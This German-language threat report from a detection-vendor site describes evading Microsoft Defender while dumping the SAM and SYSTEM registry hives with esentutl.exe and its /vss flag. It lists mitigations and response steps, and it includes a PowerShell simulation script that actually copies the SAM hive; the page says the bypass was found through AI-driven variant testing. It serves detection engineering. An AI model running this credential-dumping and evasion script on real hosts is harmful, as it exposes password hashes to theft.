Der Monat der Umgehungen: Was Defender übersieht

SOC Prime Team

Folgen

Der Monat der Umgehungen: Was Defender übersieht

Detection stack

AIDR
Alert
ETL
Query

Bedrohungsbericht
Angriffsablauf
Erkennungen
Simulationen

Zusammenfassung

Das Persistent Security-Team beschreibt eine neue Methode, um die Erkennung der Anmeldedaten-Dumping-Technik T1003.002 zu umgehen, indem das signierte Windows-Dienstprogramm esentutl.exemissbraucht wird. Durch die Verwendung von VSS-bezogenen Flags kann das Tool die SAM and SYSTEM -Registrierungsknoten kopieren, ohne Microsoft Defender auf die gleiche Weise wie bei gebräuchlicheren Dump-Methoden auszulösen.

Untersuchung

Die Forscher testeten drei traditionelle Ansätze zum Dumping der Registrierungsknoten, einschließlich reg save, vssadmin Schattenkopien und direkte Dateikopien, und stellten fest, dass jeder von ihnen von Defender blockiert wurde. Anschließend verwendeten sie AI-gesteuertes Variantentesten, um einen alternativen Pfad zu identifizieren: esentutl.exe konnte die Knoten über die eingebaute VSS-Funktionalität darauf zugreifen und extrahieren, während bestehende Defender-Erkennungen umgangen wurden.

Minderung

Empfohlene Abwehrmaßnahmen umfassen die Einschränkung von esentutl.exe über AppLocker oder WDAC, die Erstellung von Sysmon-Regeln zur Erkennung von esentutl -Ausführungen, die das /vss Flag verwenden, und die Überwachung von Schattenkopieaktivitäten, die außerhalb normalen Systemverhaltens initiiert werden. Organisationen sollten zudem LAPS für lokale Administratorenkonten bereitstellen und VSS deaktivieren, wo es nicht operationell benötigt wird.

Reaktion

If esentutl.exe wird beobachtet, wenn es mit dem /vss Flag ausgeführt wird und auf Dateien zugreift, die mit SAM or SYSTEMin Verbindung stehen, sollten Verteidiger den betroffenen Host isolieren, Speicher- und Registrierungsevidenz sammeln, bestätigen, ob ein Anmeldedaten-Dumping stattgefunden hat, und die empfohlenen Richtlinienkontrollen anwenden, um ein Wiederauftreten zu verhindern.

graph TB %% Class Definitions classDef action fill:#99ccff classDef builtin fill:#cccccc classDef file fill:#ffdd99 %% Nodes action_esentutl_exec[„Aktion – T1218.002 Proxy-Ausführung von Systembinärdateien Ausführen von esentutl.exe mit den Parametern /y /vss zur Erstellung einer Volume Shadow Copy“] class action_esentutl_exec action tool_esentutl[„Tool – Name: esentutl.exe Beschreibung: Internes Windows-Dienstprogramm zur Verwaltung der Extensible Storage Engine“] class tool_esentutl builtin action_copy_hives[„Aktion – T1003 OS Credential Dumping Kopieren der SAM- und SYSTEM-Hive-Dateien aus der Schattenkopie an einen beschreibbaren Ort“] class action_copy_hives action action_store_unsecured[„Aktion – T1552.001 Anmeldeinformationen in Dateien Speichern der extrahierten Hive-Dateien auf der Festplatte zur späteren Offline-Analyse“] class action_store_unsecured action file_sam[„Datei – sam_dump Inhalt: SAM-Hive mit Passwort-Hashes“] class file_sam file file_sys[„Datei – sys_dump Inhalt: SYSTEM-Hive mit System-Bootschlüssel“] class file_sys file %% Connections action_esentutl_exec –>|uses| tool_esentutl action_esentutl_exec –>|leads_to| action_copy_hives action_copy_hives –>|uses| tool_esentutl action_copy_hives –>|creates| file_sam action_copy_hives –>|creates| file_sys file_sam –>|used_by| action_store_unsecured file_sys –>|used_by| action_store_unsecured

Angriffsablauf

Angriffsbericht & Befehle:
Ein Angreifer, der sich Zugang zu einem kompromittierten Windows-Host verschafft hat, möchte Anmeldeinformationen ernten, ohne die üblichen Tools zur Anmeldedaten-Dump-Erkennung auszulösen, die häufig überwacht werden. Der Angreifer nutzt das eingebaute esentutl.exe Binary mit dem /vss Schalter, um eine Schattenkopie des Systemvolumens zu erstellen und den geschützten SAM-Hive zu extrahieren. Die Schritte sind:
1. Erstellen Sie ein temporäres Verzeichnis für den Snapshot-Export.
2. Aufruf von esentutl.exe mit den /y (überschreiben) und /vss Flags, wobei der SAM-Hive-Pfad anvisiert wird.
3. Kopieren Sie die exportierte SAM-Datei an einen vom Angreifer kontrollierten Ort.
4. (Optional) Säubern Sie die temporäre Snapshot-Datei, um den forensischen Fußabdruck zu reduzieren.
Diese Sequenz erzeugt ein Sysmon ProcessCreate-Ereignis, bei dem Bild endet mit esentutl.exe and Befehlszeile enthält die Zeichenfolge /vss, wodurch die Erkennungsregel erfüllt wird.

Regressionstest-Skript:

# ----------------------------------------------
# Simulation der VSS-basierten SAM-Extraktion mit esentutl
# ----------------------------------------------
$tempDir = "$env:TEMPVSS_Export"
New-Item -ItemType Directory -Path $tempDir -Force | Out-Null

# Pfad zum SAM-Knoten (schreibgeschütztes Kopie wird exportiert)
$samHive = "$env:SystemRootSystem32configSAM"
$outputFile = Join-Path $tempDir "SAM_copy.edb"

# Ausführung von esentutl mit VSS zum Export des SAM-Knotens
$esentPath = "$env:SystemRootSystem32esentutl.exe"
$arguments = "/y /vss `"$samHive`" `"$outputFile`""

Write-Host "Läuft: $esentPath $arguments"
& $esentPath $arguments

# Überprüfen, ob der Export erfolgreich war
if (Test-Path $outputFile) {
    Write-Host "SAM-Knoten exportiert nach $outputFile"
} else {
    Write-Warning "Export fehlgeschlagen oder keine Datei erstellt."
}

# Bereinigen der Snapshot-Datei (optional, hängt vom OS-Verhalten ab)
# Hinweis: VSS-Snapshot-Dateien werden in der Regel nach dem Export automatisch gelöscht.

Bereinigungskommandos:

# Entfernen von temporären Exportverzeichnissen und -dateien
$tempDir = "$env:TEMPVSS_Export"
if (Test-Path $tempDir) {
    Remove-Item -Recurse -Force -Path $tempDir
    Write-Host "Bereinigung abgeschlossen: $tempDir entfernt."
} else {
    Write-Host "Keine Bereinigung erforderlich; Verzeichnis nicht gefunden."

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten